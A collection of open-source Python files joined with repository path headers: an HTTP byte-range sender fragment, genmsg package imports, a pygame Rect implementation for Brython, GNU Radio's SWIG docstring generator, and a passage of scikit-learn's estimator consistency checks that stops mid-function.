self._connection.sendall(
'content-range: bytes %d-%d\r\n' % (self._range[0], self._range[1]))
self._connection.sendall(
'content-length: %d\r\n\r\n' % (self._range[1] - self._range[0] + 1))
def _sendContent(self):
while self._range[0] <= self._range[1]:
before = time.time()
segment = None
while time.time() - before < 40:
try:
segment = self._downloader.content().substr(self._range[0], self._range[1] + 1)
except:
time.sleep(0.05)
continue
if self._downloader.done():
self._range = (self._range[0], self._downloader.content().length() - 1)
break
elif len(segment) == 0:
time.sleep(0.05)
else:
break
if segment is None:
raise Exception("Timeout waiting for download")
if self._chunked:
if len(segment) > 0:
self._connection.sendall("%x\r\n%s\r\n" % (len(segment), segment))
else:
self._connection.sendall(segment)
self._range = (self._range[0] + len(segment), self._range[1])
if self._chunked:
self._connection.sendall("0\r\n\r\n")
|
farm3r/ardupilot
|
refs/heads/master
|
mk/PX4/Tools/genmsg/src/genmsg/__init__.py
|
215
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from . base import EXT_MSG, EXT_SRV, SEP, log, plog, InvalidMsgSpec, log_verbose, MsgGenerationException
from . gentools import compute_md5, compute_full_text, compute_md5_text
from . names import resource_name_base, package_resource_name, is_legal_resource_base_name, \
resource_name_package, resource_name, is_legal_resource_name
from . msgs import HEADER, TIME, DURATION, MsgSpec, Constant, Field
from . msg_loader import MsgNotFound, MsgContext, load_depends, load_msg_by_type, load_srv_by_type
from . srvs import SrvSpec
|
40223136/w11-2
|
refs/heads/master
|
static/Brython3.1.0-20150301-090019/Lib/site-packages/pygame/rect.py
|
603
|
#!/usr/bin/env python
'''Pygame object for storing rectangular coordinates.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import copy
#import SDL.video
import SDL
class _RectProxy:
'''Proxy for SDL_Rect that can handle negative size.'''
__slots__ = ['x', 'y', 'w', 'h']
def __init__(self, r):
if isinstance(r, SDL.SDL_Rect) or isinstance(r, Rect):
self.x = r.x
self.y = r.y
self.w = r.w
self.h = r.h
else:
self.x = r[0]
self.y = r[1]
self.w = r[2]
self.h = r[3]
def _get_as_parameter_(self):
return SDL.SDL_Rect(self.x, self.y, self.w, self.h)
_as_parameter_ = property(_get_as_parameter_)
class Rect:
__slots__ = ['_r']
def __init__(self, *args):
if len(args) == 1:
arg = args[0]
if isinstance(arg, Rect):
object.__setattr__(self, '_r', copy.copy(arg._r))
return
elif isinstance(arg, SDL.SDL_Rect):
object.__setattr__(self, '_r', copy.copy(arg))
return
elif hasattr(arg, 'rect'):
arg = arg.rect
if callable(arg):
arg = arg()
self.__init__(arg)
return
elif hasattr(arg, '__len__'):
args = arg
else:
raise TypeError('Argument must be rect style object')
if len(args) == 4:
if args[2] < 0 or args[3] < 0:
object.__setattr__(self, '_r', _RectProxy((int(args[0]),
int(args[1]),
int(args[2]),
int(args[3]))))
else:
object.__setattr__(self, '_r', SDL.SDL_Rect(int(args[0]),
int(args[1]),
int(args[2]),
int(args[3])))
elif len(args) == 2:
if args[1][0] < 0 or args[1][1] < 0:
object.__setattr__(self, '_r',
_RectProxy((int(args[0][0]),
int(args[0][1]),
int(args[1][0]),
int(args[1][1]))))
else:
object.__setattr__(self, '_r',
SDL.SDL_Rect(int(args[0][0]),
int(args[0][1]),
int(args[1][0]),
int(args[1][1])))
else:
raise TypeError('Argument must be rect style object')
def __copy__(self):
return Rect(self)
def __repr__(self):
return '<rect(%d, %d, %d, %d)>' % \
(self._r.x, self._r.y, self._r.w, self._r.h)
def __cmp__(self, *other):
other = _rect_from_object(other)
if self._r.x != other._r.x:
return cmp(self._r.x, other._r.x)
if self._r.y != other._r.y:
return cmp(self._r.y, other._r.y)
if self._r.w != other._r.w:
return cmp(self._r.w, other._r.w)
if self._r.h != other._r.h:
return cmp(self._r.h, other._r.h)
return 0
def __nonzero__(self):
return self._r.w != 0 and self._r.h != 0
def __getattr__(self, name):
if name == 'top':
return self._r.y
elif name == 'left':
return self._r.x
elif name == 'bottom':
return self._r.y + self._r.h
elif name == 'right':
return self._r.x + self._r.w
elif name == 'topleft':
return self._r.x, self._r.y
elif name == 'bottomleft':
return self._r.x, self._r.y + self._r.h
elif name == 'topright':
return self._r.x + self._r.w, self._r.y
elif name == 'bottomright':
return self._r.x + self._r.w, self._r.y + self._r.h
elif name == 'midtop':
return self._r.x + self._r.w / 2, self._r.y
elif name == 'midleft':
return self._r.x, self._r.y + self._r.h / 2
elif name == 'midbottom':
return self._r.x + self._r.w / 2, self._r.y + self._r.h
elif name == 'midright':
return self._r.x + self._r.w, self._r.y + self._r.h / 2
elif name == 'center':
return self._r.x + self._r.w / 2, self._r.y + self._r.h / 2
elif name == 'centerx':
return self._r.x + self._r.w / 2
elif name == 'centery':
return self._r.y + self._r.h / 2
elif name == 'size':
return self._r.w, self._r.h
elif name == 'width':
return self._r.w
elif name == 'height':
return self._r.h
else:
raise AttributeError(name)
def __setattr__(self, name, value):
if name == 'top' or name == 'y':
self._r.y = int(value)
elif name == 'left' or name == 'x':
self._r.x = int(value)
elif name == 'bottom':
self._r.y = int(value) - self._r.h
elif name == 'right':
self._r.x = int(value) - self._r.w
elif name == 'topleft':
self._r.x = int(value[0])
self._r.y = int(value[1])
elif name == 'bottomleft':
self._r.x = int(value[0])
self._r.y = int(value[1]) - self._r.h
elif name == 'topright':
self._r.x = int(value[0]) - self._r.w
self._r.y = int(value[1])
elif name == 'bottomright':
self._r.x = int(value[0]) - self._r.w
self._r.y = int(value[1]) - self._r.h
elif name == 'midtop':
self._r.x = int(value[0]) - self._r.w / 2
self._r.y = int(value[1])
elif name == 'midleft':
self._r.x = int(value[0])
self._r.y = int(value[1]) - self._r.h / 2
elif name == 'midbottom':
self._r.x = int(value[0]) - self._r.w / 2
self._r.y = int(value[1]) - self._r.h
elif name == 'midright':
self._r.x = int(value[0]) - self._r.w
self._r.y = int(value[1]) - self._r.h / 2
elif name == 'center':
self._r.x = int(value[0]) - self._r.w / 2
self._r.y = int(value[1]) - self._r.h / 2
elif name == 'centerx':
self._r.x = int(value) - self._r.w / 2
elif name == 'centery':
self._r.y = int(value) - self._r.h / 2
elif name == 'size':
if int(value[0]) < 0 or int(value[1]) < 0:
self._ensure_proxy()
self._r.w, self._r.h = int(value[0]), int(value[1])
elif name == 'width':
if int(value) < 0:
self._ensure_proxy()
self._r.w = int(value)
elif name == 'height':
if int(value) < 0:
self._ensure_proxy()
self._r.h = int(value)
else:
raise AttributeError(name)
def _ensure_proxy(self):
if not isinstance(self._r, _RectProxy):
object.__setattr__(self, '_r', _RectProxy(self._r))
def __len__(self):
return 4
def __getitem__(self, key):
return (self._r.x, self._r.y, self._r.w, self._r.h)[key]
def __setitem__(self, key, value):
r = [self._r.x, self._r.y, self._r.w, self._r.h]
r[key] = value
self._r.x, self._r.y, self._r.w, self._r.h = r
def __coerce__(self, *other):
try:
return self, Rect(*other)
except TypeError:
return None
def move(self, *pos):
x, y = _two_ints_from_args(pos)
return Rect(self._r.x + x, self._r.y + y, self._r.w, self._r.h)
def move_ip(self, *pos):
x, y = _two_ints_from_args(pos)
self._r.x += x
self._r.y += y
def inflate(self, x, y):
return Rect(self._r.x - x / 2, self._r.y - y / 2,
self._r.w + x, self._r.h + y)
def inflate_ip(self, x, y):
self._r.x -= x / 2
self._r.y -= y / 2
self._r.w += x
self._r.h += y
def clamp(self, *other):
r = Rect(self)
r.clamp_ip(*other)
return r
def clamp_ip(self, *other):
other = _rect_from_object(other)._r
if self._r.w >= other.w:
x = other.x + other.w / 2 - self._r.w / 2
elif self._r.x < other.x:
x = other.x
elif self._r.x + self._r.w > other.x + other.w:
x = other.x + other.w - self._r.w
else:
x = self._r.x
if self._r.h >= other.h:
y = other.y + other.h / 2 - self._r.h / 2
elif self._r.y < other.y:
y = other.y
elif self._r.y + self._r.h > other.y + other.h:
y = other.y + other.h - self._r.h
else:
y = self._r.y
self._r.x, self._r.y = x, y
def clip(self, *other):
r = Rect(self)
r.clip_ip(*other)
return r
def clip_ip(self, *other):
other = _rect_from_object(other)._r
x = max(self._r.x, other.x)
w = min(self._r.x + self._r.w, other.x + other.w) - x
y = max(self._r.y, other.y)
h = min(self._r.y + self._r.h, other.y + other.h) - y
if w <= 0 or h <= 0:
self._r.w, self._r.h = 0, 0
else:
self._r.x, self._r.y, self._r.w, self._r.h = x, y, w, h
def union(self, *other):
r = Rect(self)
r.union_ip(*other)
return r
def union_ip(self, *other):
other = _rect_from_object(other)._r
x = min(self._r.x, other.x)
y = min(self._r.y, other.y)
w = max(self._r.x + self._r.w, other.x + other.w) - x
h = max(self._r.y + self._r.h, other.y + other.h) - y
self._r.x, self._r.y, self._r.w, self._r.h = x, y, w, h
def unionall(self, others):
r = Rect(self)
r.unionall_ip(others)
return r
def unionall_ip(self, others):
l = self._r.x
r = self._r.x + self._r.w
t = self._r.y
b = self._r.y + self._r.h
for other in others:
other = _rect_from_object(other)._r
l = min(l, other.x)
r = max(r, other.x + other.w)
t = min(t, other.y)
b = max(b, other.y + other.h)
self._r.x, self._r.y, self._r.w, self._r.h = l, t, r - l, b - t
def fit(self, *other):
r = Rect(self)
r.fit_ip(*other)
return r
def fit_ip(self, *other):
other = _rect_from_object(other)._r
xratio = self._r.w / float(other.w)
yratio = self._r.h / float(other.h)
maxratio = max(xratio, yratio)
self._r.w = int(self._r.w / maxratio)
self._r.h = int(self._r.h / maxratio)
self._r.x = other.x + (other.w - self._r.w) / 2
self._r.y = other.y + (other.h - self._r.h) / 2
def normalize(self):
if self._r.w < 0:
self._r.x += self._r.w
self._r.w = -self._r.w
if self._r.h < 0:
self._r.y += self._r.h
self._r.h = -self._r.h
if isinstance(self._r, _RectProxy):
object.__setattr__(self, '_r', SDL.SDL_Rect(self._r.x,
self._r.y,
self._r.w,
self._r.h))
def contains(self, *other):
other = _rect_from_object(other)._r
return self._r.x <= other.x and \
self._r.y <= other.y and \
self._r.x + self._r.w >= other.x + other.w and \
self._r.y + self._r.h >= other.y + other.h and \
self._r.x + self._r.w > other.x and \
self._r.y + self._r.h > other.y
def collidepoint(self, x, y):
return x >= self._r.x and \
y >= self._r.y and \
x < self._r.x + self._r.w and \
y < self._r.y + self._r.h
def colliderect(self, *other):
return _rect_collide(self._r, _rect_from_object(other)._r)
def collidelist(self, others):
for i in range(len(others)):
if _rect_collide(self._r, _rect_from_object(others[i])._r):
return i
return -1
def collidelistall(self, others):
matches = []
for i in range(len(others)):
if _rect_collide(self._r, _rect_from_object(others[i])._r):
matches.append(i)
return matches
def collidedict(self, d):
for key, other in d.items():
if _rect_collide(self._r, _rect_from_object(other)._r):
return key, other
return None
def collidedictall(self, d):
matches = []
for key, other in d.items():
if _rect_collide(self._r, _rect_from_object(other)._r):
matches.append((key, other))
return matches
def _rect_from_object(obj):
if isinstance(obj, Rect):
return obj
if type(obj) in (tuple, list):
return Rect(*obj)
else:
return Rect(obj)
def _rect_collide(a, b):
return a.x + a.w > b.x and b.x + b.w > a.x and \
a.y + a.h > b.y and b.y + b.h > a.y
def _two_ints_from_args(arg):
if len(arg) == 1:
return _two_ints_from_args(arg[0])
else:
return arg[:2]
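# Construction styles accepted by Rect.__init__ above (values are illustrative):
#   Rect(10, 20, 30, 40)        # x, y, w, h
#   Rect((10, 20), (30, 40))    # (x, y) pair plus (w, h) pair
#   Rect(other)                 # another Rect, an SDL_Rect, or any object with a .rect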
|
roeebar/gr-plc
|
refs/heads/master
|
docs/doxygen/swig_doc.py
|
220
|
#
# Copyright 2010,2011 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
"""
Creates the swig_doc.i SWIG interface file.
Execute using: python swig_doc.py xml_path outputfilename
The file instructs SWIG to transfer the doxygen comments into the
python docstrings.
"""
import sys
try:
from doxyxml import DoxyIndex, DoxyClass, DoxyFriend, DoxyFunction, DoxyFile, base
except ImportError:
from gnuradio.doxyxml import DoxyIndex, DoxyClass, DoxyFriend, DoxyFunction, DoxyFile, base
def py_name(name):
bits = name.split('_')
return '_'.join(bits[1:])
def make_name(name):
bits = name.split('_')
return bits[0] + '_make_' + '_'.join(bits[1:])
class Block(object):
"""
Checks if doxyxml produced objects correspond to a gnuradio block.
"""
@classmethod
def includes(cls, item):
if not isinstance(item, DoxyClass):
return False
# Check for a parsing error.
if item.error():
return False
return item.has_member(make_name(item.name()), DoxyFriend)
def utoascii(text):
"""
Convert unicode text into ascii and escape quotes.
"""
if text is None:
return ''
out = text.encode('ascii', 'replace')
out = out.replace('"', '\\"')
return out
def combine_descriptions(obj):
"""
Combines the brief and detailed descriptions of an object together.
"""
description = []
bd = obj.brief_description.strip()
dd = obj.detailed_description.strip()
if bd:
description.append(bd)
if dd:
description.append(dd)
return utoascii('\n\n'.join(description)).strip()
entry_templ = '%feature("docstring") {name} "{docstring}"'
def make_entry(obj, name=None, templ="{description}", description=None):
"""
Create a docstring entry for a swig interface file.
obj - a doxyxml object from which documentation will be extracted.
name - the name of the C object (defaults to obj.name())
templ - an optional template for the docstring containing only one
variable named 'description'.
description - if this optional variable is set then its value is
used as the description instead of extracting it from obj.
"""
if name is None:
name=obj.name()
if "operator " in name:
return ''
if description is None:
description = combine_descriptions(obj)
docstring = templ.format(description=description)
if not docstring:
return ''
return entry_templ.format(
name=name,
docstring=docstring,
)
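# For illustration (hypothetical names), make_entry() on an object called
# 'gr_foo_bar' whose combined description is "Adds two streams." expands
# entry_templ to:
#   %feature("docstring") gr_foo_bar "Adds two streams."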
def make_func_entry(func, name=None, description=None, params=None):
"""
Create a function docstring entry for a swig interface file.
func - a doxyxml object from which documentation will be extracted.
name - the name of the C object (defaults to func.name())
description - if this optional variable is set then its value is
used as the description instead of extracting it from func.
params - a parameter list that overrides using func.params.
"""
if params is None:
params = func.params
params = [prm.declname for prm in params]
if params:
sig = "Params: (%s)" % ", ".join(params)
else:
sig = "Params: (NONE)"
templ = "{description}\n\n" + sig
return make_entry(func, name=name, templ=utoascii(templ),
description=description)
def make_class_entry(klass, description=None):
"""
Create a class docstring for a swig interface file.
"""
output = []
output.append(make_entry(klass, description=description))
for func in klass.in_category(DoxyFunction):
name = klass.name() + '::' + func.name()
output.append(make_func_entry(func, name=name))
return "\n\n".join(output)
def make_block_entry(di, block):
"""
Create class and function docstrings of a gnuradio block for a
swig interface file.
"""
descriptions = []
# Get the documentation associated with the class.
class_desc = combine_descriptions(block)
if class_desc:
descriptions.append(class_desc)
# Get the documentation associated with the make function
make_func = di.get_member(make_name(block.name()), DoxyFunction)
make_func_desc = combine_descriptions(make_func)
if make_func_desc:
descriptions.append(make_func_desc)
# Get the documentation associated with the file
try:
block_file = di.get_member(block.name() + ".h", DoxyFile)
file_desc = combine_descriptions(block_file)
if file_desc:
descriptions.append(file_desc)
except base.Base.NoSuchMember:
# Don't worry if we can't find a matching file.
pass
# And join them all together to make a super duper description.
super_description = "\n\n".join(descriptions)
# Associate the combined description with the class and
# the make function.
output = []
output.append(make_class_entry(block, description=super_description))
creator = block.get_member(block.name(), DoxyFunction)
output.append(make_func_entry(make_func, description=super_description,
params=creator.params))
return "\n\n".join(output)
def make_swig_interface_file(di, swigdocfilename, custom_output=None):
output = ["""
/*
* This file was automatically generated using swig_doc.py.
*
* Any changes to it will be lost next time it is regenerated.
*/
"""]
if custom_output is not None:
output.append(custom_output)
# Create docstrings for the blocks.
blocks = di.in_category(Block)
make_funcs = set([])
for block in blocks:
try:
make_func = di.get_member(make_name(block.name()), DoxyFunction)
make_funcs.add(make_func.name())
output.append(make_block_entry(di, block))
except block.ParsingError:
print('Parsing error for block %s' % block.name())
# Create docstrings for functions
# Don't include the make functions since they have already been dealt with.
funcs = [f for f in di.in_category(DoxyFunction) if f.name() not in make_funcs]
for f in funcs:
try:
output.append(make_func_entry(f))
except f.ParsingError:
print('Parsing error for function %s' % f.name())
# Create docstrings for classes
block_names = [block.name() for block in blocks]
klasses = [k for k in di.in_category(DoxyClass) if k.name() not in block_names]
for k in klasses:
try:
output.append(make_class_entry(k))
except k.ParsingError:
print('Parsing error for class %s' % k.name())
# Docstrings are not created for anything that is not a function or a class.
# If this excludes anything important please add it here.
output = "\n\n".join(output)
swig_doc = file(swigdocfilename, 'w')
swig_doc.write(output)
swig_doc.close()
if __name__ == "__main__":
# Parse command line options and set up doxyxml.
err_msg = "Execute using: python swig_doc.py xml_path outputfilename"
if len(sys.argv) != 3:
raise StandardError(err_msg)
xml_path = sys.argv[1]
swigdocfilename = sys.argv[2]
di = DoxyIndex(xml_path)
# gnuradio.gr.msg_queue.insert_tail and delete_head create errors unless docstrings are defined!
# This is presumably a bug in SWIG.
#msg_q = di.get_member(u'gr_msg_queue', DoxyClass)
#insert_tail = msg_q.get_member(u'insert_tail', DoxyFunction)
#delete_head = msg_q.get_member(u'delete_head', DoxyFunction)
output = []
#output.append(make_func_entry(insert_tail, name='gr_py_msg_queue__insert_tail'))
#output.append(make_func_entry(delete_head, name='gr_py_msg_queue__delete_head'))
custom_output = "\n\n".join(output)
# Generate the docstrings interface file.
make_swig_interface_file(di, swigdocfilename, custom_output=custom_output)
|
hdmetor/scikit-learn
|
refs/heads/master
|
sklearn/utils/estimator_checks.py
|
30
|
from __future__ import print_function
import types
import warnings
import sys
import traceback
import inspect
import pickle
from copy import deepcopy
import numpy as np
from scipy import sparse
import struct
from sklearn.externals.six.moves import zip
from sklearn.externals.joblib import hash, Memory
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_raises_regex
from sklearn.utils.testing import assert_raise_message
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_in
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_warns_message
from sklearn.utils.testing import META_ESTIMATORS
from sklearn.utils.testing import set_random_state
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import SkipTest
from sklearn.utils.testing import ignore_warnings
from sklearn.base import (clone, ClassifierMixin, RegressorMixin,
TransformerMixin, ClusterMixin, BaseEstimator)
from sklearn.metrics import accuracy_score, adjusted_rand_score, f1_score
from sklearn.lda import LDA
from sklearn.random_projection import BaseRandomProjection
from sklearn.feature_selection import SelectKBest
from sklearn.svm.base import BaseLibSVM
from sklearn.pipeline import make_pipeline
from sklearn.utils.validation import DataConversionWarning
from sklearn.cross_validation import train_test_split
from sklearn.utils import shuffle
from sklearn.preprocessing import StandardScaler
from sklearn.datasets import load_iris, load_boston, make_blobs
BOSTON = None
CROSS_DECOMPOSITION = ['PLSCanonical', 'PLSRegression', 'CCA', 'PLSSVD']
def _yield_non_meta_checks(name, Estimator):
yield check_estimators_dtypes
yield check_fit_score_takes_y
yield check_dtype_object
yield check_estimators_fit_returns_self
# Check that all estimator yield informative messages when
# trained on empty datasets
yield check_estimators_empty_data_messages
if name not in CROSS_DECOMPOSITION + ['SpectralEmbedding']:
# SpectralEmbedding is non-deterministic,
# see issue #4236
# cross-decomposition's "transform" returns X and Y
yield check_pipeline_consistency
if name not in ['Imputer']:
# Test that all estimators check their input for NaN's and infs
yield check_estimators_nan_inf
if name not in ['GaussianProcess']:
# FIXME!
# in particular GaussianProcess!
yield check_estimators_overwrite_params
if hasattr(Estimator, 'sparsify'):
yield check_sparsify_coefficients
yield check_estimator_sparse_data
def _yield_classifier_checks(name, Classifier):
# test classifiers can handle non-array data
yield check_classifier_data_not_an_array
# test classifiers trained on a single label always return this label
yield check_classifiers_one_label
yield check_classifiers_classes
yield check_classifiers_pickle
yield check_estimators_partial_fit_n_features
# basic consistency testing
yield check_classifiers_train
if (name not in ["MultinomialNB", "LabelPropagation", "LabelSpreading"]
# TODO some complication with -1 label
and name not in ["DecisionTreeClassifier",
"ExtraTreeClassifier"]):
# We don't raise a warning in these classifiers, as
# the column y interface is used by the forests.
# test if classifiers can cope with y.shape = (n_samples, 1)
yield check_classifiers_input_shapes
# test if NotFittedError is raised
yield check_estimators_unfitted
if 'class_weight' in Classifier().get_params().keys():
yield check_class_weight_classifiers
def _yield_regressor_checks(name, Regressor):
# TODO: test with intercept
# TODO: test with multiple responses
# basic testing
yield check_regressors_train
yield check_regressor_data_not_an_array
yield check_estimators_partial_fit_n_features
yield check_regressors_no_decision_function
# Test that estimators can be pickled, and once pickled
# give the same answer as before.
yield check_regressors_pickle
if name != 'CCA':
# check that the regressor handles int input
yield check_regressors_int
# Test if NotFittedError is raised
yield check_estimators_unfitted
def _yield_transformer_checks(name, Transformer):
# All transformers should either deal with sparse data or raise an
# exception with type TypeError and an intelligible error message
yield check_transformer_pickle
if name not in ['AdditiveChi2Sampler', 'Binarizer', 'Normalizer',
'PLSCanonical', 'PLSRegression', 'CCA', 'PLSSVD']:
yield check_transformer_data_not_an_array
# these don't actually fit the data, so don't raise errors
if name not in ['AdditiveChi2Sampler', 'Binarizer', 'Normalizer']:
# basic tests
yield check_transformer_general
yield check_transformers_unfitted
def _yield_clustering_checks(name, Clusterer):
yield check_clusterer_compute_labels_predict
if name not in ('WardAgglomeration', "FeatureAgglomeration"):
# this is clustering on the features
# let's not test that here.
yield check_clustering
yield check_estimators_partial_fit_n_features
def _yield_all_checks(name, Estimator):
for check in _yield_non_meta_checks(name, Estimator):
yield check
if issubclass(Estimator, ClassifierMixin):
for check in _yield_classifier_checks(name, Estimator):
yield check
if issubclass(Estimator, RegressorMixin):
for check in _yield_regressor_checks(name, Estimator):
yield check
if issubclass(Estimator, TransformerMixin):
for check in _yield_transformer_checks(name, Estimator):
yield check
if issubclass(Estimator, ClusterMixin):
for check in _yield_clustering_checks(name, Estimator):
yield check
def check_estimator(Estimator):
"""Check if estimator adheres to sklearn conventions.
This function will run an extensive test-suite for input validation,
shapes, etc.
Additional tests for classifiers, regressors, clustering or transformers
will be run if the Estimator class inherits from the corresponding mixin
from sklearn.base.
Parameters
----------
Estimator : class
Class to check.
"""
name = Estimator.__name__
check_parameters_default_constructible(name, Estimator)
for check in _yield_all_checks(name, Estimator):
check(name, Estimator)
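# Minimal usage sketch (assuming any scikit-learn compatible estimator class):
#   from sklearn.linear_model import LogisticRegression
#   check_estimator(LogisticRegression)   # raises on the first failing check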
def _boston_subset(n_samples=200):
global BOSTON
if BOSTON is None:
boston = load_boston()
X, y = boston.data, boston.target
X, y = shuffle(X, y, random_state=0)
X, y = X[:n_samples], y[:n_samples]
X = StandardScaler().fit_transform(X)
BOSTON = X, y
return BOSTON
def set_fast_parameters(estimator):
# speed up some estimators
params = estimator.get_params()
if ("n_iter" in params
and estimator.__class__.__name__ != "TSNE"):
estimator.set_params(n_iter=5)
if "max_iter" in params:
# NMF
if estimator.max_iter is not None:
estimator.set_params(max_iter=min(5, estimator.max_iter))
# LinearSVR
if estimator.__class__.__name__ == 'LinearSVR':
estimator.set_params(max_iter=20)
if "n_resampling" in params:
# randomized lasso
estimator.set_params(n_resampling=5)
if "n_estimators" in params:
# especially gradient boosting with default 100
estimator.set_params(n_estimators=min(5, estimator.n_estimators))
if "max_trials" in params:
# RANSAC
estimator.set_params(max_trials=10)
if "n_init" in params:
# K-Means
estimator.set_params(n_init=2)
if estimator.__class__.__name__ == "SelectFdr":
# be tolerant of noisy datasets (not actually speed)
estimator.set_params(alpha=.5)
if estimator.__class__.__name__ == "TheilSenRegressor":
estimator.max_subpopulation = 100
if isinstance(estimator, BaseRandomProjection):
# Due to the jl lemma and often very few samples, the number
# of components of the random matrix projection will be probably
# greater than the number of features.
# So we impose a smaller number (avoid "auto" mode)
estimator.set_params(n_components=1)
if isinstance(estimator, SelectKBest):
# SelectKBest has a default of k=10
# which is more features than we have in most cases.
estimator.set_params(k=1)
class NotAnArray(object):
" An object that is convertable to an array"
def __init__(self, data):
self.data = data
def __array__(self, dtype=None):
return self.data
def _is_32bit():
"""Detect if process is 32bit Python."""
return struct.calcsize('P') * 8 == 32
def check_estimator_sparse_data(name, Estimator):
rng = np.random.RandomState(0)
X = rng.rand(40, 10)
X[X < .8] = 0
X = sparse.csr_matrix(X)
y = (4 * rng.rand(40)).astype(np.int)
# catch deprecation warnings
with warnings.catch_warnings():
if name in ['Scaler', 'StandardScaler']:
estimator = Estimator(with_mean=False)
else:
estimator = Estimator()
set_fast_parameters(estimator)
# fit and predict
try:
estimator.fit(X, y)
if hasattr(estimator, "predict"):
estimator.predict(X)
if hasattr(estimator, 'predict_proba'):
estimator.predict_proba(X)
except TypeError as e:
if 'sparse' not in repr(e):
            print("Estimator %s doesn't seem to fail gracefully on "
                  "sparse data: the error message should state explicitly that "
"sparse input is not supported if this is not the case."
% name)
raise
except Exception:
print("Estimator %s doesn't seem to fail gracefully on "
"sparse data: it should raise a TypeError if sparse input "
"is explicitly not supported." % name)
raise
def check_dtype_object(name, Estimator):
# check that estimators treat dtype object as numeric if possible
rng = np.random.RandomState(0)
X = rng.rand(40, 10).astype(object)
y = (X[:, 0] * 4).astype(np.int)
y = multioutput_estimator_convert_y_2d(name, y)
with warnings.catch_warnings():
estimator = Estimator()
set_fast_parameters(estimator)
estimator.fit(X, y)
if hasattr(estimator, "predict"):
estimator.predict(X)
if hasattr(estimator, "transform"):
estimator.transform(X)
try:
estimator.fit(X, y.astype(object))
except Exception as e:
if "Unknown label type" not in str(e):
raise
X[0, 0] = {'foo': 'bar'}
msg = "argument must be a string or a number"
assert_raises_regex(TypeError, msg, estimator.fit, X, y)
def check_transformer_general(name, Transformer):
X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]],
random_state=0, n_features=2, cluster_std=0.1)
X = StandardScaler().fit_transform(X)
X -= X.min()
_check_transformer(name, Transformer, X, y)
_check_transformer(name, Transformer, X.tolist(), y.tolist())
def check_transformer_data_not_an_array(name, Transformer):
X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]],
random_state=0, n_features=2, cluster_std=0.1)
X = StandardScaler().fit_transform(X)
    # We need to make sure that we have non-negative data, for things
# like NMF
X -= X.min() - .1
this_X = NotAnArray(X)
this_y = NotAnArray(np.asarray(y))
_check_transformer(name, Transformer, this_X, this_y)
def check_transformers_unfitted(name, Transformer):
X, y = _boston_subset()
with warnings.catch_warnings(record=True):
transformer = Transformer()
assert_raises((AttributeError, ValueError), transformer.transform, X)
def _check_transformer(name, Transformer, X, y):
if name in ('CCA', 'LocallyLinearEmbedding', 'KernelPCA') and _is_32bit():
# Those transformers yield non-deterministic output when executed on
# a 32bit Python. The same transformers are stable on 64bit Python.
# FIXME: try to isolate a minimalistic reproduction case only depending
# on numpy & scipy and/or maybe generate a test dataset that does not
# cause such unstable behaviors.
msg = name + ' is non deterministic on 32bit Python'
raise SkipTest(msg)
n_samples, n_features = np.asarray(X).shape
# catch deprecation warnings
with warnings.catch_warnings(record=True):
transformer = Transformer()
set_random_state(transformer)
set_fast_parameters(transformer)
# fit
if name in CROSS_DECOMPOSITION:
y_ = np.c_[y, y]
y_[::2, 1] *= 2
else:
y_ = y
transformer.fit(X, y_)
X_pred = transformer.fit_transform(X, y=y_)
if isinstance(X_pred, tuple):
for x_pred in X_pred:
assert_equal(x_pred.shape[0], n_samples)
else:
assert_equal(X_pred.shape[0], n_samples)
if hasattr(transformer, 'transform'):
if name in CROSS_DECOMPOSITION:
X_pred2 = transformer.transform(X, y_)
X_pred3 = transformer.fit_transform(X, y=y_)
else:
X_pred2 = transformer.transform(X)
X_pred3 = transformer.fit_transform(X, y=y_)
if isinstance(X_pred, tuple) and isinstance(X_pred2, tuple):
for x_pred, x_pred2, x_pred3 in zip(X_pred, X_pred2, X_pred3):
assert_array_almost_equal(
x_pred, x_pred2, 2,
"fit_transform and transform outcomes not consistent in %s"
% Transformer)
assert_array_almost_equal(
x_pred, x_pred3, 2,
"consecutive fit_transform outcomes not consistent in %s"
% Transformer)
else:
assert_array_almost_equal(
X_pred, X_pred2, 2,
